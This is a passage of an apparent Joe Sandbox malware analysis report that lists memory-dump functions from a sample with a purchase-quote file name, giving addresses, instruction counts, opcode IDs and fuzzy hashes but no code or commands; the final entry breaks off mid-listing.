                                                                                                                                                                                                • Instruction ID: d6b67ee3cca811baa44cb9add825620f2d9ba498559192feab24b314227ed431
                                                                                                                                                                                                • Opcode Fuzzy Hash: f21a519627470e3e30b28f04bc77abd1cf64f4b6f147297c151c4bf4c89abf1f
                                                                                                                                                                                                • Instruction Fuzzy Hash: 5C21F1B1A04200DFDB55DF58D884B16BBA5EF84718F20C56ADD0A4B367C33AD407CA61
                                                                                                                                                                                                Function 06810667 Relevance: .1, Instructions: 71COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2477791458.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6810000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 1bcd7d5eb5a94d2a59dd3f843458b2e060e48cb35d9362f6d06e287ba0115a93
                                                                                                                                                                                                • Instruction ID: 585e035bfce5762fbb8045781c15be3d2f10d803536be5a24d925365a445060c
                                                                                                                                                                                                • Opcode Fuzzy Hash: 1bcd7d5eb5a94d2a59dd3f843458b2e060e48cb35d9362f6d06e287ba0115a93
                                                                                                                                                                                                • Instruction Fuzzy Hash: CF1187387002148B9BD56B39985423E76BB9FC5555B08442ADB07CB390DF36CC82CF96
                                                                                                                                                                                                Function 0172FE50 Relevance: .1, Instructions: 70COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2463237088.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1720000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 8bbf5bb8187c6e6b4d892f528cf4bcaae22bf77dc7cfd02db1a3c8a9e0ff97ef
                                                                                                                                                                                                • Instruction ID: bc2c0b95fef8d802686853952594e7b88bbe46199ece23a6a3243e7bd11646b7
                                                                                                                                                                                                • Opcode Fuzzy Hash: 8bbf5bb8187c6e6b4d892f528cf4bcaae22bf77dc7cfd02db1a3c8a9e0ff97ef
                                                                                                                                                                                                • Instruction Fuzzy Hash: 613127302006108FC765DB28C458BA6B7E6FF89711F1585A9E15ECB361CF70A88A8B40
                                                                                                                                                                                                Function 01720848 Relevance: .1, Instructions: 68COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2463237088.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1720000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: d197ce23eb24b5ffe219467d42357ca49b9e345f1ad093689f496e48c1908291
                                                                                                                                                                                                • Instruction ID: 639911690cc2600c38913c8431b7f6eefd927ea95b692c3a5f696888ff96c406
                                                                                                                                                                                                • Opcode Fuzzy Hash: d197ce23eb24b5ffe219467d42357ca49b9e345f1ad093689f496e48c1908291
                                                                                                                                                                                                • Instruction Fuzzy Hash: 8821FB7190021D9FDB05DFE9C8A15EEBBB2FF88700F108529D1126B664DA355E858B91
                                                                                                                                                                                                Function 08199643 Relevance: .1, Instructions: 68COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479657020.0000000008190000.00000040.00000800.00020000.00000000.sdmp, Offset: 08190000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_8190000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 4beed721a72be62e44e19f2cc889be87a2405f1849f6a65c3d321d41fa37194c
                                                                                                                                                                                                • Instruction ID: 837d504755afbe787b4fb1abbee22bf05d323cb705932aabaafbd0be2b164e78
                                                                                                                                                                                                • Opcode Fuzzy Hash: 4beed721a72be62e44e19f2cc889be87a2405f1849f6a65c3d321d41fa37194c
                                                                                                                                                                                                • Instruction Fuzzy Hash: FA21F4B4C06208DFCB11DFB4E4182ADBFB0EF0A306F2495AED445A7250D7758A81CFA1
                                                                                                                                                                                                Function 080BEFF3 Relevance: .1, Instructions: 66COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479536866.00000000080B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080B0000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_80b0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: cc340936d7720dee6309b1146f4efc5e4508d45af8ba50bded623294e815d9d5
                                                                                                                                                                                                • Instruction ID: f6972aa99fbe9c278182531a75b2cc7c1a265dedcccb9d94c58ed1d357e743f7
                                                                                                                                                                                                • Opcode Fuzzy Hash: cc340936d7720dee6309b1146f4efc5e4508d45af8ba50bded623294e815d9d5
                                                                                                                                                                                                • Instruction Fuzzy Hash: 46212134919385EFC705DFB8D8190CDBFB3EF4A201B2490A7C545D7265EA388A02C721
                                                                                                                                                                                                Function 080BD691 Relevance: .1, Instructions: 65COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479536866.00000000080B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080B0000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_80b0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 497b4f4ec4b31dfc1cadb815cd4b2181891efc6b4c81f46fd5c23d400216ea6c
                                                                                                                                                                                                • Instruction ID: ec5689baf7be06425ba206d67f09dba0ac149f98943f683d583ff8b3d7b5e382
                                                                                                                                                                                                • Opcode Fuzzy Hash: 497b4f4ec4b31dfc1cadb815cd4b2181891efc6b4c81f46fd5c23d400216ea6c
                                                                                                                                                                                                • Instruction Fuzzy Hash: 26215774A012499FCB05CFA5E550AEEBFF7EF48302F148069E951A6250EB34D981DF20
                                                                                                                                                                                                Function 080BF0D0 Relevance: .1, Instructions: 65COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479536866.00000000080B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080B0000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_80b0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 1a6ad41858bc349d16850a31a01ab29f2fa525db5a659f160885f108cf96f012
                                                                                                                                                                                                • Instruction ID: ce2843e086a4926024accc488c7755f50e87a381ca939598a5519e9de7f1f84c
                                                                                                                                                                                                • Opcode Fuzzy Hash: 1a6ad41858bc349d16850a31a01ab29f2fa525db5a659f160885f108cf96f012
                                                                                                                                                                                                • Instruction Fuzzy Hash: E5214874E05208AFDB04DFA9D98499DFBF2EF88300F14C8AAD519A7365D7309A01CB40
                                                                                                                                                                                                Function 0172691F Relevance: .1, Instructions: 64COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2463237088.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1720000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: dea1b5c889615f898958f38e60ffb79f8eec365271b6fb396d280053a700af5f
                                                                                                                                                                                                • Instruction ID: c81b6cefa94aa51468b8cc317d0dc800cec008b9cb5b8f19e0420b3f324d7417
                                                                                                                                                                                                • Opcode Fuzzy Hash: dea1b5c889615f898958f38e60ffb79f8eec365271b6fb396d280053a700af5f
                                                                                                                                                                                                • Instruction Fuzzy Hash: 0F11E131B046249FDB25AF28D4487AAFBA2FB84721F14816FED4587240CB30D882CB91
                                                                                                                                                                                                Function 0172DEF8 Relevance: .1, Instructions: 64COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2463237088.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1720000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 7988c5c67e28792400f5486b3943ab9c23420014e8a00dafd9a5fe8c6009bf21
                                                                                                                                                                                                • Instruction ID: 18c2b568723563eec5ba39db763302c076b2620ae7c9779d6b6699781cb4cb2a
                                                                                                                                                                                                • Opcode Fuzzy Hash: 7988c5c67e28792400f5486b3943ab9c23420014e8a00dafd9a5fe8c6009bf21
                                                                                                                                                                                                • Instruction Fuzzy Hash: B0115C7030D3A41FD31606799C1466BFF9AAFCB221F1884BBE145C72DBCE288C028365
                                                                                                                                                                                                Function 01727A68 Relevance: .1, Instructions: 63COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2463237088.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1720000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 995abcc254c90452dc74e59b9b00efc6dd762e3875faec34a494661b52141368
                                                                                                                                                                                                • Instruction ID: 574577d69267f09685a13b3f684f2990f31d60fba33d996a240cffef1c54a21f
                                                                                                                                                                                                • Opcode Fuzzy Hash: 995abcc254c90452dc74e59b9b00efc6dd762e3875faec34a494661b52141368
                                                                                                                                                                                                • Instruction Fuzzy Hash: BE219D31900218DFCB29CF58D944BEABBF1FB58324F00816EE54A9B212E3759A46CB90
                                                                                                                                                                                                Function 0145D005 Relevance: .1, Instructions: 63COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2462566823.000000000145D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0145D000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_145d000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: de4ad25dbef4b20fc4ca792f6d7c6a384e3c6c604d24c2025c28d57fde195294
                                                                                                                                                                                                • Instruction ID: 4ad21e152e53f769e832d3b2c7e6ec476ec04c8e85c9d873c4d5c254ac7d569b
                                                                                                                                                                                                • Opcode Fuzzy Hash: de4ad25dbef4b20fc4ca792f6d7c6a384e3c6c604d24c2025c28d57fde195294
                                                                                                                                                                                                • Instruction Fuzzy Hash: 692183755083809FDB03CF64D994716BF71EF46214F28C5DAD8498F2A7C33A9806CB62
                                                                                                                                                                                                Function 080BF0E0 Relevance: .1, Instructions: 62COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479536866.00000000080B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080B0000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_80b0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: db11c441b7cb2810b75537bece60d71a71dc50ed290922fd7102af8858a7d09b
                                                                                                                                                                                                • Instruction ID: b1f56544086d036b3b655f7b62443cda360710292816a2da517785e88073918a
                                                                                                                                                                                                • Opcode Fuzzy Hash: db11c441b7cb2810b75537bece60d71a71dc50ed290922fd7102af8858a7d09b
                                                                                                                                                                                                • Instruction Fuzzy Hash: 8921E774E05209EFDB44DFA9D98499EFBF2EB88300F14D9A9D519A7365D7309A01CB40
                                                                                                                                                                                                Function 0144D10F Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2462522215.000000000144D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0144D000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_144d000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
                                                                                                                                                                                                • Instruction ID: 98d9bce1bb781f56b1aaf06ec50faa98b38dc5cc34cd6df0c30d4cbca1137403
                                                                                                                                                                                                • Opcode Fuzzy Hash: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
                                                                                                                                                                                                • Instruction Fuzzy Hash: 1B11DF76904280CFEB06CF44D9C4B16BF72FB94324F24C1AADC090B666C336D45ACBA1
                                                                                                                                                                                                Function 080BE86D Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479536866.00000000080B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080B0000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_80b0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 0606759f298356fc9a8282f6657a5c2fc4e59b8fe670d8cb0bc76186ac3e534c
                                                                                                                                                                                                • Instruction ID: 6f5658b8a418a261014590aacee16bbbf139e1d9cdf735e6a9c90ba4c8e50ed7
                                                                                                                                                                                                • Opcode Fuzzy Hash: 0606759f298356fc9a8282f6657a5c2fc4e59b8fe670d8cb0bc76186ac3e534c
                                                                                                                                                                                                • Instruction Fuzzy Hash: 1601B972A0E3E16FC747572898304EE7F768E9322170A45DBF498CB0A3D525495AC3B6
                                                                                                                                                                                                Function 0145D1CF Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2462566823.000000000145D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0145D000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_145d000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                                                                                                                                                                                                • Instruction ID: c1fc03025b3709c333ef91d4f2fba0a67f6a1a4799cd0aacd0253939362fc687
                                                                                                                                                                                                • Opcode Fuzzy Hash: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                                                                                                                                                                                                • Instruction Fuzzy Hash: C011A975904280DFDB02CF54C5C4B16BBA2FB84224F24C6AEEC494B3A7C33AD44ACB61
                                                                                                                                                                                                Function 06812B63 Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2477791458.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6810000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: b195d53a66b464f45d9bb32da479a79fe1f240724e3dffcf2f85e12f5831348f
                                                                                                                                                                                                • Instruction ID: 6d512f88c6fcb17122619f1ca0a30d196cbe3c0b4164b696823e71f4ac39d475
                                                                                                                                                                                                • Opcode Fuzzy Hash: b195d53a66b464f45d9bb32da479a79fe1f240724e3dffcf2f85e12f5831348f
                                                                                                                                                                                                • Instruction Fuzzy Hash: 52018471F107058BCB95DF7ED8547AEBBFAAF88600B14816ADA15DB300EB30D941CB95
                                                                                                                                                                                                Function 06811EA8 Relevance: .0, Instructions: 50COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2477791458.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6810000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 4c1bd71f6ebb98980d6f45b1ecf5a2e37bf960f107e9710d6057b67261150ca8
                                                                                                                                                                                                • Instruction ID: be6f4ace5aa77f9337efba41f391a0852e8edd7ad5395192d6a4354d855b2bd4
                                                                                                                                                                                                • Opcode Fuzzy Hash: 4c1bd71f6ebb98980d6f45b1ecf5a2e37bf960f107e9710d6057b67261150ca8
                                                                                                                                                                                                • Instruction Fuzzy Hash: FF018F347101144F8795AB6DC468A3E36DBEBC8A513190069EB1ACB361EF74CC0287E1
                                                                                                                                                                                                Function 0144D7D9 Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2462522215.000000000144D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0144D000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_144d000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 4ddd9520f36d218a5199dd1fbe1ccade409ae679159de555c810d216fd239cf9
                                                                                                                                                                                                • Instruction ID: 5f6e67679ab865f0b8ebad395a79020c6f35cde699b625c3ba22c15cc0848a51
                                                                                                                                                                                                • Opcode Fuzzy Hash: 4ddd9520f36d218a5199dd1fbe1ccade409ae679159de555c810d216fd239cf9
                                                                                                                                                                                                • Instruction Fuzzy Hash: 4101F2318083449BF7219A9ACC84B77BFE8DF61321F18C81BED1D0A296C7399841CAB1
                                                                                                                                                                                                Function 080BF020 Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479536866.00000000080B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080B0000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_80b0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: f4bdd3ae637b5327fa706c8c017febd6e159bd5ea9e01628cac8f53be5fa314d
                                                                                                                                                                                                • Instruction ID: 8a7106096347ecf5efe0bea61aba84f4cfc0d873823e99dc92d77216242498b6
                                                                                                                                                                                                • Opcode Fuzzy Hash: f4bdd3ae637b5327fa706c8c017febd6e159bd5ea9e01628cac8f53be5fa314d
                                                                                                                                                                                                • Instruction Fuzzy Hash: FA019E74A15209EFC744DFB9D94819DBBF7EB89312F20E4A6C60AD3224EB349A51CB01
                                                                                                                                                                                                Function 06811E98 Relevance: .0, Instructions: 44COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2477791458.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6810000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: d52f08982bfb8a29566a9acff195ba8bed89c1680b18675b47ab32b1edfd0a95
                                                                                                                                                                                                • Instruction ID: c289d4bd0552868383a243a3920ba17e56104deeeef47ff2f3b1be16aceb78f8
                                                                                                                                                                                                • Opcode Fuzzy Hash: d52f08982bfb8a29566a9acff195ba8bed89c1680b18675b47ab32b1edfd0a95
                                                                                                                                                                                                • Instruction Fuzzy Hash: D8F0C2353105004FC748AB6DD498B7E77EBFBC9661B0A016AE606CB3A2EE65CC0187D0
                                                                                                                                                                                                Function 0144D7D8 Relevance: .0, Instructions: 36COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2462522215.000000000144D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0144D000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_144d000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: af545b349e55531430ea7dee2fbbe091d70d5df37046e874c2e6bd2dbf945274
                                                                                                                                                                                                • Instruction ID: bc916febba40da590b9ab44fc983c51667f7ae19b9433b3d879c67b82140bf03
                                                                                                                                                                                                • Opcode Fuzzy Hash: af545b349e55531430ea7dee2fbbe091d70d5df37046e874c2e6bd2dbf945274
                                                                                                                                                                                                • Instruction Fuzzy Hash: 9AF0C2318043409AF7218A0ACC88B63FF98EB91234F18C45BED0C0A296C3799844CA70
                                                                                                                                                                                                Function 068105F0 Relevance: .0, Instructions: 36COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2477791458.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6810000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 5f62ae6f5963a45b78bd7d94d8f0b63071ecee43953576f123d5a1ffc41c5a1b
                                                                                                                                                                                                • Instruction ID: f6afc586f7d2c49c21f45398fc58bbcc774fe77c7b56eb408ac6db451ee30fd0
                                                                                                                                                                                                • Opcode Fuzzy Hash: 5f62ae6f5963a45b78bd7d94d8f0b63071ecee43953576f123d5a1ffc41c5a1b
                                                                                                                                                                                                • Instruction Fuzzy Hash: B7F06D307103548FC7E5AB28DC50B6E3BA9ABC5656F0500AED35ACF251DE749C86C791
                                                                                                                                                                                                Function 06810600 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2477791458.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6810000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 4195d99326c71bca10414f727aa1a5b8a473f8dd37f2603449714b9b9614b3a6
                                                                                                                                                                                                • Instruction ID: 765c592fa754b82f88a3e9b3e928902f27fbeccf61b34b2f1b55832d78ecd3be
                                                                                                                                                                                                • Opcode Fuzzy Hash: 4195d99326c71bca10414f727aa1a5b8a473f8dd37f2603449714b9b9614b3a6
                                                                                                                                                                                                • Instruction Fuzzy Hash: 99F03A307103288FC6E4AA29DC50B6E36EAABC8656F054469D75ACF250DE70AC86C791
                                                                                                                                                                                                Function 06810219 Relevance: .0, Instructions: 33COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2477791458.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6810000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 736cc14f357fe6184414b05a8b75e59f28cfd63b882ed7e8000ae5b9c6a53c1c
                                                                                                                                                                                                • Instruction ID: 952da0dfe5d9eda1d1508f1fcb1f769864691041ceda456e7f363be2a5a541df
                                                                                                                                                                                                • Opcode Fuzzy Hash: 736cc14f357fe6184414b05a8b75e59f28cfd63b882ed7e8000ae5b9c6a53c1c
                                                                                                                                                                                                • Instruction Fuzzy Hash: F9019239600108CFCB54DF68D58499C7BB5FF48325F254199E916AB3A1C732ED85CF50
                                                                                                                                                                                                Function 080B4C50 Relevance: .0, Instructions: 32COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479536866.00000000080B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080B0000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_80b0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
